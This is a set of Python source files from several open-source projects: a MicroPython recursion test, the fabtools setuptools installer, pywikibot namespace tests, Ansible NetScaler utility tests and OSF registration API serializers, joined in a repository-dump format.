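    # For example (illustrative usage), Color = enum('RED', 'GREEN', BLUE=10)
    # gives Color.RED == 0, Color.GREEN == 1 and Color.BLUE == 10.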
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
|
drrk/micropython
|
refs/heads/master
|
tests/misc/recursive_iternext.py
|
3
|
# This tests that recursion with iternext doesn't lead to segfault.
try:
[0] * 10000
N = 1000
except:
N = 100
try:
x = (1, 2)
for i in range(N):
x = enumerate(x)
tuple(x)
except RuntimeError:
print("RuntimeError")
try:
x = (1, 2)
for i in range(N):
x = filter(None, x)
tuple(x)
except RuntimeError:
print("RuntimeError")
try:
x = (1, 2)
for i in range(N):
x = map(max, x, ())
tuple(x)
except RuntimeError:
print("RuntimeError")
try:
x = (1, 2)
for i in range(N):
x = zip(x)
tuple(x)
except RuntimeError:
print("RuntimeError")
|
n0n0x/fabtools-python
|
refs/heads/master
|
fabtools/python_setuptools.py
|
2
|
"""
Python packages
===============
This module provides tools for installing Python packages using
the ``easy_install`` command provided by `setuptools`_.
.. _setuptools: http://pythonhosted.org/setuptools/
"""
from fabric.api import cd, run
from fabtools.utils import download, run_as_root
# Python2 and 3 compatibility
from past.builtins import basestring
EZ_SETUP_URL = 'https://bootstrap.pypa.io/ez_setup.py'
def package_version(name, python_cmd='python'):
"""
Get the installed version of a package
Returns ``None`` if it can't be found.
"""
cmd = '''%(python_cmd)s -c \
"import pkg_resources;\
dist = pkg_resources.get_distribution('%(name)s');\
print(dist.version)"
''' % locals()
res = run(cmd, quiet=True)
if res.succeeded:
return res
else:
return None
def is_setuptools_installed(python_cmd='python'):
"""
Check if `setuptools`_ is installed.
.. _setuptools: http://pythonhosted.org/setuptools/
"""
version = package_version('setuptools', python_cmd=python_cmd)
return (version is not None)
def install_setuptools(python_cmd='python', use_sudo=True):
"""
Install the latest version of `setuptools`_.
::
import fabtools
fabtools.python_setuptools.install_setuptools()
"""
setuptools_version = package_version('setuptools', python_cmd)
distribute_version = package_version('distribute', python_cmd)
if setuptools_version is None:
_install_from_scratch(python_cmd, use_sudo)
else:
if distribute_version is None:
_upgrade_from_setuptools(python_cmd, use_sudo)
else:
_upgrade_from_distribute(python_cmd, use_sudo)
def _install_from_scratch(python_cmd, use_sudo):
"""
Install setuptools from scratch using installer
"""
with cd("/tmp"):
download(EZ_SETUP_URL)
command = '%(python_cmd)s ez_setup.py' % locals()
if use_sudo:
run_as_root(command)
else:
run(command)
run('rm -f ez_setup.py')
def _upgrade_from_setuptools(python_cmd, use_sudo):
"""
Upgrading from setuptools 0.6 to 0.7+ is supported
"""
_easy_install(['-U', 'setuptools'], python_cmd, use_sudo)
def _upgrade_from_distribute(python_cmd, use_sudo):
"""
Upgrading from distribute 0.6 to setuptools 0.7+ directly is not
supported. We need to upgrade distribute to version 0.7, which is
a dummy package acting as a wrapper to install setuptools 0.7+.
"""
_easy_install(['-U', 'distribute'], python_cmd, use_sudo)
def install(packages, upgrade=False, use_sudo=False, python_cmd='python'):
"""
Install Python packages with ``easy_install``.
Examples::
import fabtools
# Install a single package
fabtools.python_setuptools.install('package', use_sudo=True)
# Install a list of packages
fabtools.python_setuptools.install(['pkg1', 'pkg2'], use_sudo=True)
.. note:: most of the time, you'll want to use
:py:func:`fabtools.python.install()` instead,
which uses ``pip`` to install packages.
"""
argv = []
if upgrade:
argv.append("-U")
if isinstance(packages, basestring):
argv.append(packages)
else:
argv.extend(packages)
_easy_install(argv, python_cmd, use_sudo)
def _easy_install(argv, python_cmd, use_sudo):
"""
Install packages using easy_install
We don't know if the easy_install command in the path will be the
right one, so we use the setuptools entry point to call the script's
main function ourselves.
"""
command = """python -c "\
from pkg_resources import load_entry_point;\
ez = load_entry_point('setuptools', 'console_scripts', 'easy_install');\
ez(argv=%(argv)r)\
""" % locals()
if use_sudo:
run_as_root(command)
else:
run(command)
|
happy5214/pywikibot-core
|
refs/heads/master
|
tests/namespace_tests.py
|
5
|
# -*- coding: utf-8 -*-
"""Tests for the Namespace class."""
#
# (C) Pywikibot team, 2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
from collections import Iterable
from pywikibot.site import Namespace, NamespacesDict
from pywikibot.tools import (
PY2,
StringTypes as basestring,
UnicodeType as unicode,
)
from tests.aspects import unittest, TestCase, AutoDeprecationTestCase
# Default namespaces which should work in any MW wiki
_base_builtin_ns = {
'Media': -2,
'Special': -1,
'': 0,
'Talk': 1,
'User': 2,
'User talk': 3,
'Project': 4,
'Project talk': 5,
'MediaWiki': 8,
'MediaWiki talk': 9,
'Template': 10,
'Template talk': 11,
'Help': 12,
'Help talk': 13,
'Category': 14,
'Category talk': 15,
}
image_builtin_ns = dict(_base_builtin_ns)
image_builtin_ns['Image'] = 6
image_builtin_ns['Image talk'] = 7
file_builtin_ns = dict(_base_builtin_ns)
file_builtin_ns['File'] = 6
file_builtin_ns['File talk'] = 7
builtin_ns = dict(list(image_builtin_ns.items()) + list(file_builtin_ns.items()))
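# builtin_ns maps every builtin namespace name, covering both the legacy
# 'Image' and the modern 'File' spellings of namespaces 6 and 7.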
def builtin_NamespacesDict():
"""Return a NamespacesDict of the builtin namespaces."""
return NamespacesDict(Namespace.builtin_namespaces())
class TestNamespaceObject(TestCase):
"""Test cases for Namespace class."""
net = False
def testNamespaceTypes(self):
"""Test cases for methods manipulating Namespace names."""
ns = Namespace.builtin_namespaces(use_image_name=False)
self.assertIsInstance(ns, dict)
self.assertTrue(all(x in ns for x in range(0, 16)))
self.assertTrue(all(isinstance(key, int)
for key in ns))
self.assertTrue(all(isinstance(val, Iterable)
for val in ns.values()))
self.assertTrue(all(isinstance(name, basestring)
for val in ns.values()
for name in val))
# Use a namespace object as a dict key
self.assertEqual(ns[ns[6]], ns[6])
def testNamespaceConstructor(self):
"""Test Namespace constructor."""
kwargs = {u'case': u'first-letter'}
y = Namespace(id=6, custom_name=u'dummy', canonical_name=u'File',
aliases=[u'Image', u'Immagine'], **kwargs)
self.assertEqual(y.id, 6)
self.assertEqual(y.custom_name, u'dummy')
self.assertEqual(y.canonical_name, u'File')
self.assertNotEqual(y.custom_name, u'Dummy')
self.assertNotEqual(y.canonical_name, u'file')
self.assertIn(u'Image', y.aliases)
self.assertIn(u'Immagine', y.aliases)
self.assertEqual(len(y), 4)
self.assertEqual(list(y), ['dummy', u'File', u'Image', u'Immagine'])
self.assertEqual(y.case, u'first-letter')
def testNamespaceNameCase(self):
"""Namespace names are always case-insensitive."""
kwargs = {u'case': u'first-letter'}
y = Namespace(id=6, custom_name=u'dummy', canonical_name=u'File',
aliases=[u'Image', u'Immagine'], **kwargs)
self.assertIn(u'dummy', y)
self.assertIn(u'Dummy', y)
self.assertIn(u'file', y)
self.assertIn(u'File', y)
self.assertIn(u'image', y)
self.assertIn(u'Image', y)
self.assertIn(u'immagine', y)
self.assertIn(u'Immagine', y)
def testNamespaceToString(self):
"""Test Namespace __str__ and __unicode__."""
ns = Namespace.builtin_namespaces(use_image_name=False)
self.assertEqual(str(ns[0]), ':')
self.assertEqual(str(ns[1]), 'Talk:')
self.assertEqual(str(ns[6]), ':File:')
self.assertEqual(unicode(ns[0]), u':')
self.assertEqual(unicode(ns[1]), u'Talk:')
self.assertEqual(unicode(ns[6]), u':File:')
kwargs = {u'case': u'first-letter'}
y = Namespace(id=6, custom_name=u'ملف', canonical_name=u'File',
aliases=[u'Image', u'Immagine'], **kwargs)
self.assertEqual(str(y), ':File:')
if PY2:
self.assertEqual(unicode(y), u':ملف:')
self.assertEqual(y.canonical_prefix(), ':File:')
self.assertEqual(y.custom_prefix(), u':ملف:')
def testNamespaceCompare(self):
"""Test Namespace comparisons."""
a = Namespace(id=0, canonical_name=u'')
self.assertEqual(a, 0)
self.assertEqual(a, '')
self.assertFalse(a < 0)
self.assertFalse(a > 0)
self.assertNotEqual(a, None)
self.assertGreater(a, -1)
x = Namespace(id=6, custom_name=u'dummy', canonical_name=u'File',
aliases=[u'Image', u'Immagine'])
y = Namespace(id=6, custom_name=u'ملف', canonical_name=u'File',
aliases=[u'Image', u'Immagine'])
z = Namespace(id=7, custom_name=u'dummy 7', canonical_name=u'File',
aliases=[u'Image', u'Immagine'])
self.assertEqual(x, x)
self.assertEqual(x, y)
self.assertNotEqual(x, a)
self.assertNotEqual(x, z)
self.assertEqual(x, 6)
self.assertEqual(x, u'dummy')
self.assertEqual(x, u'Dummy')
self.assertEqual(x, u'file')
self.assertEqual(x, u'File')
self.assertEqual(x, u':File')
self.assertEqual(x, u':File:')
self.assertEqual(x, u'File:')
self.assertEqual(x, u'image')
self.assertEqual(x, u'Image')
self.assertFalse(x < 6)
self.assertFalse(x > 6)
self.assertEqual(y, u'ملف')
self.assertLess(a, x)
self.assertLess(x, z)
self.assertLessEqual(a, x)
self.assertGreater(x, a)
self.assertGreater(x, 0)
self.assertGreater(z, x)
self.assertGreaterEqual(x, a)
self.assertGreaterEqual(y, x)
self.assertIn(6, [x, y, z])
self.assertNotIn(8, [x, y, z])
def testNamespaceNormalizeName(self):
"""Test Namespace.normalize_name."""
self.assertEqual(Namespace.normalize_name(u'File'), u'File')
self.assertEqual(Namespace.normalize_name(u':File'), u'File')
self.assertEqual(Namespace.normalize_name(u'File:'), u'File')
self.assertEqual(Namespace.normalize_name(u':File:'), u'File')
self.assertEqual(Namespace.normalize_name(u''), u'')
self.assertEqual(Namespace.normalize_name(u':'), False)
self.assertEqual(Namespace.normalize_name(u'::'), False)
self.assertEqual(Namespace.normalize_name(u':::'), False)
self.assertEqual(Namespace.normalize_name(u':File::'), False)
self.assertEqual(Namespace.normalize_name(u'::File:'), False)
self.assertEqual(Namespace.normalize_name(u'::File::'), False)
def test_repr(self):
"""Test Namespace.__repr__."""
a = Namespace(id=0, canonical_name=u'Foo')
s = repr(a)
r = "Namespace(id=0, custom_name=%r, canonical_name=%r, aliases=[])" \
% (unicode('Foo'), unicode('Foo'))
self.assertEqual(s, r)
a.defaultcontentmodel = 'bar'
s = repr(a)
r = ('Namespace(id=0, custom_name=%r, canonical_name=%r, aliases=[], '
'defaultcontentmodel=%r)' %
(unicode('Foo'), unicode('Foo'), unicode('bar')))
self.assertEqual(s, r)
a.case = 'upper'
s = repr(a)
r = ('Namespace(id=0, custom_name=%r, canonical_name=%r, aliases=[], '
'case=%r, defaultcontentmodel=%r)' %
(unicode('Foo'), unicode('Foo'), unicode('upper'), unicode('bar')))
self.assertEqual(s, r)
b = eval(repr(a))
self.assertEqual(a, b)
class TestNamespaceDictDeprecated(AutoDeprecationTestCase):
"""Test static/classmethods in Namespace replaced by NamespacesDict."""
net = False
def test_resolve_equal(self):
"""Test Namespace.resolve success."""
namespaces = Namespace.builtin_namespaces(use_image_name=False)
main_ns = namespaces[0]
file_ns = namespaces[6]
special_ns = namespaces[-1]
self.assertEqual(Namespace.resolve([6]), [file_ns])
self.assertEqual(Namespace.resolve(['File']), [file_ns])
self.assertEqual(Namespace.resolve(['6']), [file_ns])
self.assertEqual(Namespace.resolve([file_ns]), [file_ns])
self.assertEqual(Namespace.resolve([file_ns, special_ns]),
[file_ns, special_ns])
self.assertEqual(Namespace.resolve([file_ns, file_ns]),
[file_ns, file_ns])
self.assertEqual(Namespace.resolve(6), [file_ns])
self.assertEqual(Namespace.resolve('File'), [file_ns])
self.assertEqual(Namespace.resolve('6'), [file_ns])
self.assertEqual(Namespace.resolve(file_ns), [file_ns])
self.assertEqual(Namespace.resolve(0), [main_ns])
self.assertEqual(Namespace.resolve('0'), [main_ns])
self.assertEqual(Namespace.resolve(-1), [special_ns])
self.assertEqual(Namespace.resolve('-1'), [special_ns])
self.assertEqual(Namespace.resolve('File:'), [file_ns])
self.assertEqual(Namespace.resolve(':File'), [file_ns])
self.assertEqual(Namespace.resolve(':File:'), [file_ns])
self.assertEqual(Namespace.resolve('Image:'), [file_ns])
self.assertEqual(Namespace.resolve(':Image'), [file_ns])
self.assertEqual(Namespace.resolve(':Image:'), [file_ns])
def test_resolve_exceptions(self):
"""Test Namespace.resolve failure."""
self.assertRaises(TypeError, Namespace.resolve, [True])
self.assertRaises(TypeError, Namespace.resolve, [False])
self.assertRaises(TypeError, Namespace.resolve, [None])
self.assertRaises(TypeError, Namespace.resolve, True)
self.assertRaises(TypeError, Namespace.resolve, False)
self.assertRaises(TypeError, Namespace.resolve, None)
self.assertRaises(KeyError, Namespace.resolve, -10)
self.assertRaises(KeyError, Namespace.resolve, '-10')
self.assertRaises(KeyError, Namespace.resolve, 'foo')
self.assertRaises(KeyError, Namespace.resolve, ['foo'])
self.assertRaisesRegex(KeyError,
r'Namespace identifier\(s\) not recognised: -10',
Namespace.resolve, [-10, 0])
self.assertRaisesRegex(KeyError,
r'Namespace identifier\(s\) not recognised: foo',
Namespace.resolve, [0, 'foo'])
self.assertRaisesRegex(KeyError,
r'Namespace identifier\(s\) not recognised: -10,-11',
Namespace.resolve, [-10, 0, -11])
def test_lookup_name(self):
"""Test Namespace.lookup_name."""
file_nses = Namespace.builtin_namespaces(use_image_name=False)
image_nses = Namespace.builtin_namespaces(use_image_name=True)
for name, ns_id in builtin_ns.items():
file_ns = Namespace.lookup_name(name, file_nses)
self.assertIsInstance(file_ns, Namespace)
image_ns = Namespace.lookup_name(name, image_nses)
self.assertIsInstance(image_ns, Namespace)
with self.disable_assert_capture():
self.assertEqual(file_ns.id, ns_id)
self.assertEqual(image_ns.id, ns_id)
class TestNamespaceCollections(TestCase):
"""Test how Namespace interact when in collections."""
net = False
def test_set(self):
"""Test converting sequence of Namespace to a set."""
namespaces = Namespace.builtin_namespaces(use_image_name=False)
self.assertTrue(all(isinstance(x, int) for x in namespaces))
self.assertTrue(all(isinstance(x, int) for x in namespaces.keys()))
self.assertTrue(all(isinstance(x, Namespace)
for x in namespaces.values()))
namespaces_set = set(namespaces)
self.assertEqual(len(namespaces), len(namespaces_set))
self.assertTrue(all(isinstance(x, int) for x in namespaces_set))
def test_set_minus(self):
"""Test performing set minus operation on set of Namespace objects."""
namespaces = Namespace.builtin_namespaces(use_image_name=False)
excluded_namespaces = set([-1, -2])
positive_namespaces = set(namespaces) - excluded_namespaces
self.assertEqual(len(namespaces),
len(positive_namespaces) + len(excluded_namespaces))
class TestNamespacesDictLookupName(TestCase):
"""Test NamespacesDict.lookup_name and lookup_normalized_name."""
net = False
def test_lookup_name(self):
"""Test lookup_name."""
namespaces = builtin_NamespacesDict()
self.assertIs(namespaces.lookup_name('project'), namespaces[4])
self.assertIs(namespaces.lookup_name('PROJECT'), namespaces[4])
self.assertIs(namespaces.lookup_name('Project'), namespaces[4])
self.assertIs(namespaces.lookup_name('Project:'), namespaces[4])
def test_lookup_normalized_name(self):
"""Test lookup_normalized_name."""
namespaces = builtin_NamespacesDict()
self.assertIs(namespaces.lookup_normalized_name('project'),
namespaces[4])
self.assertIsNone(namespaces.lookup_normalized_name('PROJECT'))
self.assertIsNone(namespaces.lookup_normalized_name('Project'))
self.assertIsNone(namespaces.lookup_normalized_name('Project:'))
class TestNamespacesDictGetItem(TestCase):
"""Test NamespacesDict.__getitem__."""
net = False
def test_ids(self):
"""Test lookup by canonical namespace id."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
self.assertEqual(namespace, namespaces[namespace.id])
def test_namespace(self):
"""Test lookup by Namespace object."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
self.assertEqual(namespace, namespaces[namespace])
def test_invalid_id(self):
"""Test lookup by invalid id."""
namespaces = builtin_NamespacesDict()
lower = min(namespaces.keys()) - 1
higher = max(namespaces.keys()) + 1
self.assertRaises(KeyError, namespaces.__getitem__, lower)
self.assertRaises(KeyError, namespaces.__getitem__, higher)
def test_canonical_name(self):
"""Test lookup by canonical namespace name."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
self.assertEqual(namespace, namespaces[namespace.canonical_name])
self.assertEqual(namespace,
namespaces[namespace.canonical_name.upper()])
def test_canonical_attr(self):
"""Test attribute lookup by canonical namespace name."""
namespaces = builtin_NamespacesDict()
self.assertEqual(namespaces[0], namespaces.MAIN)
self.assertEqual(namespaces[1], namespaces.TALK)
for namespace in namespaces.values():
if namespace.id == 0:
continue
attr = namespace.canonical_name.upper()
self.assertEqual(namespace, getattr(namespaces, attr))
def test_all(self):
"""Test lookup by any namespace name."""
namespaces = builtin_NamespacesDict()
for namespace in namespaces.values():
for name in namespace:
self.assertEqual(namespace, namespaces[name.upper()])
def test_invalid_name(self):
"""Test lookup by invalid name."""
namespaces = builtin_NamespacesDict()
self.assertRaises(KeyError, namespaces.__getitem__, 'FOO')
# '|' is not permitted in namespace names
self.assertRaises(KeyError, namespaces.__getitem__, '|')
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
|
1844144/django-blog-zinnia
|
refs/heads/deep
|
zinnia/tests/implementations/__init__.py
|
17
|
"""
Implementation components at the project level
needed for testing Zinnia.
"""
|
skg-net/ansible
|
refs/heads/devel
|
test/units/modules/network/netscaler/test_netscaler_module_utils.py
|
56
|
# Copyright (c) 2017 Citrix Systems
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import Mock
from ansible.module_utils.network.netscaler.netscaler import ConfigProxy, get_immutables_intersection, ensure_feature_is_enabled, log, loglines
class TestNetscalerConfigProxy(unittest.TestCase):
def test_values_copied_to_actual(self):
actual = Mock()
client = Mock()
values = {
'some_key': 'some_value',
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['some_key']
)
self.assertEqual(actual.some_key, values['some_key'], msg='Failed to pass correct value from values dict')
def test_none_values_not_copied_to_actual(self):
actual = Mock()
client = Mock()
actual.key_for_none = 'initial'
print('actual %s' % actual.key_for_none)
values = {
'key_for_none': None,
}
print('value %s' % actual.key_for_none)
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['key_for_none']
)
self.assertEqual(actual.key_for_none, 'initial')
def test_missing_from_values_dict_not_copied_to_actual(self):
actual = Mock()
client = Mock()
values = {
'irrelevant_key': 'irrelevant_value',
}
print('value %s' % actual.key_for_none)
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['key_for_none']
)
print('none %s' % getattr(actual, 'key_for_none'))
self.assertIsInstance(actual.key_for_none, Mock)
def test_bool_yes_no_transform(self):
actual = Mock()
client = Mock()
values = {
'yes_key': True,
'no_key': False,
}
transforms = {
'yes_key': ['bool_yes_no'],
'no_key': ['bool_yes_no']
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['yes_key', 'no_key'],
transforms=transforms,
)
actual_values = [actual.yes_key, actual.no_key]
self.assertListEqual(actual_values, ['YES', 'NO'])
def test_bool_on_off_transform(self):
actual = Mock()
client = Mock()
values = {
'on_key': True,
'off_key': False,
}
transforms = {
'on_key': ['bool_on_off'],
'off_key': ['bool_on_off']
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['on_key', 'off_key'],
transforms=transforms,
)
actual_values = [actual.on_key, actual.off_key]
self.assertListEqual(actual_values, ['ON', 'OFF'])
def test_callable_transform(self):
actual = Mock()
client = Mock()
values = {
'transform_key': 'hello',
'transform_chain': 'hello',
}
transforms = {
'transform_key': [lambda v: v.upper()],
'transform_chain': [lambda v: v.upper(), lambda v: v[:4]]
}
ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['transform_key', 'transform_chain'],
transforms=transforms,
)
actual_values = [actual.transform_key, actual.transform_chain]
self.assertListEqual(actual_values, ['HELLO', 'HELL'])
class TestNetscalerModuleUtils(unittest.TestCase):
def test_immutables_intersection(self):
actual = Mock()
client = Mock()
values = {
'mutable_key': 'some value',
'immutable_key': 'some other value',
}
proxy = ConfigProxy(
actual=actual,
client=client,
attribute_values_dict=values,
readwrite_attrs=['mutable_key', 'immutable_key'],
immutable_attrs=['immutable_key'],
)
keys_to_check = ['mutable_key', 'immutable_key', 'non_existent_key']
result = get_immutables_intersection(proxy, keys_to_check)
self.assertListEqual(result, ['immutable_key'])
def test_ensure_feature_is_enabled(self):
client = Mock()
attrs = {'get_enabled_features.return_value': ['GSLB']}
client.configure_mock(**attrs)
ensure_feature_is_enabled(client, 'GSLB')
ensure_feature_is_enabled(client, 'LB')
client.enable_features.assert_called_once_with('LB')
def test_log_function(self):
messages = [
'First message',
'Second message',
]
log(messages[0])
log(messages[1])
self.assertListEqual(messages, loglines, msg='Log messages not recorded correctly')
|
abought/osf.io
|
refs/heads/develop
|
api/registrations/serializers.py
|
2
|
import json
from modularodm.exceptions import ValidationValueError
from rest_framework import serializers as ser
from rest_framework import exceptions
from api.base.utils import absolute_reverse, get_user_auth
from website.project.metadata.utils import is_prereg_admin_not_project_admin
from website.exceptions import NodeStateError
from website.project.model import NodeUpdateError
from api.files.serializers import FileSerializer
from api.nodes.serializers import NodeSerializer, NodeProviderSerializer
from api.nodes.serializers import NodeLinksSerializer, NodeLicenseSerializer
from api.nodes.serializers import NodeContributorsSerializer, NodeTagField
from api.base.serializers import (IDField, RelationshipField, LinksField, HideIfWithdrawal,
FileCommentRelationshipField, NodeFileHyperLinkField, HideIfRegistration, JSONAPIListField)
class BaseRegistrationSerializer(NodeSerializer):
title = ser.CharField(read_only=True)
description = ser.CharField(read_only=True)
category_choices = NodeSerializer.category_choices
category_choices_string = NodeSerializer.category_choices_string
category = HideIfWithdrawal(ser.ChoiceField(read_only=True, choices=category_choices, help_text='Choices: ' + category_choices_string))
date_modified = HideIfWithdrawal(ser.DateTimeField(read_only=True))
fork = HideIfWithdrawal(ser.BooleanField(read_only=True, source='is_fork'))
collection = HideIfWithdrawal(ser.BooleanField(read_only=True, source='is_collection'))
node_license = HideIfWithdrawal(NodeLicenseSerializer(read_only=True))
tags = HideIfWithdrawal(JSONAPIListField(child=NodeTagField(), read_only=True))
public = HideIfWithdrawal(ser.BooleanField(source='is_public', required=False,
help_text='Nodes that are made public will give read-only access '
'to everyone. Private nodes require explicit read '
'permission. Write and admin access are the same for '
'public and private nodes. Administrators on a parent '
'node have implicit read permissions for all child nodes'))
current_user_permissions = HideIfWithdrawal(ser.SerializerMethodField(help_text='List of strings representing the permissions '
'for the current user on this node.'))
pending_embargo_approval = HideIfWithdrawal(ser.BooleanField(read_only=True, source='is_pending_embargo',
help_text='The associated Embargo is awaiting approval by project admins.'))
pending_registration_approval = HideIfWithdrawal(ser.BooleanField(source='is_pending_registration', read_only=True,
help_text='The associated RegistrationApproval is awaiting approval by project admins.'))
pending_withdrawal = HideIfWithdrawal(ser.BooleanField(source='is_pending_retraction', read_only=True,
help_text='The registration is awaiting withdrawal approval by project admins.'))
withdrawn = ser.BooleanField(source='is_retracted', read_only=True,
help_text='The registration has been withdrawn.')
date_registered = ser.DateTimeField(source='registered_date', read_only=True, help_text='Date time of registration.')
embargo_end_date = HideIfWithdrawal(ser.SerializerMethodField(help_text='When the embargo on this registration will be lifted.'))
withdrawal_justification = ser.CharField(source='retraction.justification', read_only=True)
template_from = HideIfWithdrawal(ser.CharField(read_only=True, allow_blank=False, allow_null=False,
help_text='Specify a node id for a node you would like to use as a template for the '
'new node. Templating is like forking, except that you do not copy the '
'files, only the project structure. Some information is changed on the top '
'level project by submitting the appropriate fields in the request body, '
'and some information will not change. By default, the description will '
'be cleared and the project will be made private.'))
registration_supplement = ser.SerializerMethodField()
registered_meta = HideIfWithdrawal(ser.SerializerMethodField(
help_text='A dictionary with supplemental registration questions and responses.'))
registered_by = HideIfWithdrawal(RelationshipField(
related_view='users:user-detail',
related_view_kwargs={'user_id': '<registered_user_id>'}
))
registered_from = HideIfWithdrawal(RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<registered_from_id>'}
))
children = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-children',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_node_count'},
))
comments = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-comments',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'unread': 'get_unread_comments_count'},
filter={'target': '<pk>'}
))
contributors = RelationshipField(
related_view='registrations:registration-contributors',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_contrib_count'}
)
files = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-providers',
related_view_kwargs={'node_id': '<pk>'}
))
wikis = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-wikis',
related_view_kwargs={'node_id': '<pk>'},
))
forked_from = HideIfWithdrawal(RelationshipField(
related_view=lambda n: 'registrations:registration-detail' if getattr(n, 'is_registration', False) else 'nodes:node-detail',
related_view_kwargs={'node_id': '<forked_from_id>'}
))
license = HideIfWithdrawal(RelationshipField(
related_view='licenses:license-detail',
related_view_kwargs={'license_id': '<node_license.node_license._id>'},
))
logs = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-logs',
related_view_kwargs={'node_id': '<pk>'},
))
forks = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-forks',
related_view_kwargs={'node_id': '<pk>'}
))
node_links = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-pointers',
related_view_kwargs={'node_id': '<pk>'},
related_meta={'count': 'get_pointers_count'}
))
parent = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-detail',
related_view_kwargs={'node_id': '<parent_node._id>'},
filter_key='parent_node'
))
root = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-detail',
related_view_kwargs={'node_id': '<root._id>'}
))
affiliated_institutions = HideIfWithdrawal(RelationshipField(
related_view='registrations:registration-institutions',
related_view_kwargs={'node_id': '<pk>'}
))
registration_schema = RelationshipField(
related_view='metaschemas:metaschema-detail',
related_view_kwargs={'metaschema_id': '<registered_schema_id>'}
)
registrations = HideIfRegistration(RelationshipField(
related_view='nodes:node-registrations',
related_view_kwargs={'node_id': '<pk>'}
))
draft_registrations = HideIfRegistration(RelationshipField(
related_view='nodes:node-draft-registrations',
related_view_kwargs={'node_id': '<pk>'}
))
identifiers = HideIfWithdrawal(RelationshipField(
related_view='registrations:identifier-list',
related_view_kwargs={'node_id': '<pk>'}
))
links = LinksField({'self': 'get_registration_url', 'html': 'get_absolute_html_url'})
def get_registration_url(self, obj):
return absolute_reverse('registrations:registration-detail', kwargs={'node_id': obj._id})
def get_absolute_url(self, obj):
return self.get_registration_url(obj)
def create(self, validated_data):
auth = get_user_auth(self.context['request'])
draft = validated_data.pop('draft')
registration_choice = validated_data.pop('registration_choice', 'immediate')
embargo_lifted = validated_data.pop('lift_embargo', None)
reviewer = is_prereg_admin_not_project_admin(self.context['request'], draft)
try:
draft.validate_metadata(metadata=draft.registration_metadata, reviewer=reviewer, required_fields=True)
except ValidationValueError as e:
raise exceptions.ValidationError(e.message)
registration = draft.register(auth, save=True)
if registration_choice == 'embargo':
if not embargo_lifted:
raise exceptions.ValidationError('lift_embargo must be specified.')
embargo_end_date = embargo_lifted.replace(tzinfo=None)
try:
registration.embargo_registration(auth.user, embargo_end_date)
except ValidationValueError as err:
raise exceptions.ValidationError(err.message)
else:
try:
registration.require_approval(auth.user)
except NodeStateError as err:
raise exceptions.ValidationError(err)
registration.save()
return registration
def get_registered_meta(self, obj):
if obj.registered_meta:
meta_values = obj.registered_meta.values()[0]
try:
return json.loads(meta_values)
except TypeError:
return meta_values
except ValueError:
return meta_values
return None
def get_embargo_end_date(self, obj):
if obj.embargo_end_date:
return obj.embargo_end_date
return None
def get_registration_supplement(self, obj):
if obj.registered_schema:
schema = obj.registered_schema[0]
if schema is None:
return None
return schema.name
return None
def get_current_user_permissions(self, obj):
return NodeSerializer.get_current_user_permissions(self, obj)
def update(self, registration, validated_data):
is_public = validated_data.get('is_public', False)
if is_public:
try:
registration.update(validated_data)
except NodeUpdateError as err:
raise exceptions.ValidationError(err.reason)
else:
raise exceptions.ValidationError('Registrations can only be turned from private to public.')
return registration
class Meta:
type_ = 'registrations'
class RegistrationSerializer(BaseRegistrationSerializer):
"""
Overrides BaseRegistrationSerializer to add draft_registration, registration_choice, and lift_embargo fields
"""
draft_registration = ser.CharField(write_only=True)
registration_choice = ser.ChoiceField(write_only=True, choices=['immediate', 'embargo'])
lift_embargo = ser.DateTimeField(write_only=True, default=None, input_formats=['%Y-%m-%dT%H:%M:%S'])
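# Note (illustrative, not part of the original module): given the
# input_formats above, lift_embargo accepts timestamps written as,
# e.g., '2018-01-01T00:00:00'.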
class RegistrationDetailSerializer(BaseRegistrationSerializer):
"""
Overrides BaseRegistrationSerializer to make id required.
"""
id = IDField(source='_id', required=True)
class RegistrationNodeLinksSerializer(NodeLinksSerializer):
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'registrations:registration-pointer-detail',
kwargs={
'node_id': node_id,
'node_link_id': obj._id
}
)
class RegistrationContributorsSerializer(NodeContributorsSerializer):
def get_absolute_url(self, obj):
node_id = self.context['request'].parser_context['kwargs']['node_id']
return absolute_reverse(
'registrations:registration-contributor-detail',
kwargs={
'node_id': node_id,
'user_id': obj._id
}
)
class RegistrationFileSerializer(FileSerializer):
files = NodeFileHyperLinkField(
related_view='registrations:registration-files',
related_view_kwargs={'node_id': '<node_id>', 'path': '<path>', 'provider': '<provider>'},
kind='folder'
)
